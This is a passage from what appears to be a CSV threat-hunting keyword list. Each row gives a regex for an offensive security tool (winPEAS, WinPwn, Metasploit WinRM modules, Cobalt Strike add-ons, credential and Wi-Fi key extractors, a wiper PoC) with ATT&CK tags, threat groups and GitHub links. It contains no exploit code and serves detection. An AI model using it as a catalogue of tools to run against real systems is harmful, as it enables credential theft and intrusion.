T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEAS-Obfuscated*",".{0,1000}winPEAS\-Obfuscated.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASps1*",".{0,1000}winPEASps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx64_ofs.exe*",".{0,1000}winPEASx64_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*Win-PS2EXE.exe*",".{0,1000}Win\-PS2EXE\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*WinPwn -*",".{0,1000}WinPwn\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*WinPwn.exe*",".{0,1000}WinPwn\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*WinPwn.ps1*",".{0,1000}WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*WinPwnage*",".{0,1000}WinPwnage.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2541","377","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" "*winpwnage.functions*",".{0,1000}winpwnage\.functions.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*winreconstreamline.bat*",".{0,1000}winreconstreamline\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*winregistry.py*",".{0,1000}winregistry\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*WinRM already running on port 5985. Unexploitable!*",".{0,1000}WinRM\salready\srunning\son\sport\s5985\.\sUnexploitable!.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*winrm_command_shell.rb*",".{0,1000}winrm_command_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*winrm_script_exec.*",".{0,1000}winrm_script_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*winrm-detection.py*",".{0,1000}winrm\-detection\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*winrmdll *",".{0,1000}winrmdll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","0","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*winrmdll.*",".{0,1000}winrmdll\..{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*WinSCPPasswdExtractor*",".{0,1000}WinSCPPasswdExtractor.{0,1000}","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","1","11","1","2023-07-01T17:27:32Z","2022-12-20T11:55:55Z" "*WinShellcode.git*",".{0,1000}WinShellcode\.git.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WinShellcode-main*",".{0,1000}WinShellcode\-main.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Winsocky-main*",".{0,1000}Winsocky\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*WINspect.ps1*",".{0,1000}WINspect\.ps1.{0,1000}","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Information Gathering","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","6","571","116","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z" "*win-x64-DynamicKernelWinExecCalc*",".{0,1000}win\-x64\-DynamicKernelWinExecCalc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*Wiper POC tool that wipes a given directory*",".{0,1000}Wiper\sPOC\stool\sthat\swipes\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*WiperPoc.exe*",".{0,1000}WiperPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*WiperPoc\WiperPoc*",".{0,1000}WiperPoc\\WiperPoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*wireghoul/htshells*",".{0,1000}wireghoul\/htshells.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*wireless/captures.py*",".{0,1000}wireless\/captures\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/cracker.py*",".{0,1000}wireless\/cracker\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/pmkid.py*",".{0,1000}wireless\/pmkid\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/sniper.py*",".{0,1000}wireless\/sniper\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless_attack_tools.py*",".{0,1000}wireless_attack_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*wirelesskeyview.exe*",".{0,1000}wirelesskeyview\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wirelesskeyview.zip*",".{0,1000}wirelesskeyview\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WirelessKeyView_x64.exe*",".{0,1000}WirelessKeyView_x64\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wirelesskeyview-no-command-line.zip*",".{0,1000}wirelesskeyview\-no\-command\-line\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wirelesskeyview-x64.zip*",".{0,1000}wirelesskeyview\-x64\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wiresocks-main*",".{0,1000}wiresocks\-main.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*wiresocks-redsocks*",".{0,1000}wiresocks\-redsocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*Witness.py*",".{0,1000}Witness\.py.{0,1000}","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4706","819","2024-02-22T17:22:45Z","2014-02-26T16:23:25Z" "*WitnessMe*",".{0,1000}WitnessMe.{0,1000}","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","8","711","109","2024-04-02T08:19:14Z","2019-07-06T05:25:10Z" "*wkhtmltoimage.py*",".{0,1000}wkhtmltoimage\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*",".{0,1000}WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*WKL-Sec/dcomhijack*",".{0,1000}WKL\-Sec\/dcomhijack.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*WKL-Sec/HiddenDesktop*",".{0,1000}WKL\-Sec\/HiddenDesktop.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*WKL-Sec/Winsocky*",".{0,1000}WKL\-Sec\/Winsocky.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*wkssvc_##*",".{0,1000}wkssvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 